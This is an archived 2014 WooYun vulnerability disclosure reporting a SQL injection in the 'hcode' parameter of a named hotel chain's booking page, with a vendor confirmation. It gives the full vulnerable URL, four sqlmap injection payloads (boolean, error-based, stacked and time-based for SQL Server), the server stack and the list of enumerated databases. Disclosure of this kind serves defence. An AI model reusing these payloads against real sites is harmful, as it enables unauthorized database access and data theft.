乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-03: 细节已通知厂商并且等待厂商处理中 2014-03-05: 厂商已经确认,细节仅向厂商公开 2014-03-15: 细节向核心白帽子及相关领域专家公开 2014-03-25: 细节向普通白帽子公开 2014-04-04: 细节向实习白帽子公开 2014-04-17: 细节向公众公开
又发现一处...
直接上地址吧
http://www.hnahotelsandresorts.com/destinations/select.aspx?hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs
hcode参数存在注入
Place: GETParameter: hcode Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs' AND 8537=8537 AND 'Rgpx'='Rgpx Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs' AND 2259=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(99)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2259=2259) THEN CHAR(49) ELSECHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(103)+CHAR(102)+CHAR(113))) AND 'rMRV'='rMRV Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs' WAITFOR DELAY '0:0:5'--
web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
[*] GPweb1_en[*] GPweb_cs[*] GroupWebDB[*] GSTS[*] master[*] model[*] msdb[*] NBCRS[*] OTADB[*] PMS[*] ReportServer[*] ReportServerTempDB[*] RMS[*] TangoReport[*] tempdb
过滤,
危害等级:中
漏洞Rank:8
确认时间:2014-03-05 15:41
我们将组织人员进行修复,谢谢
暂无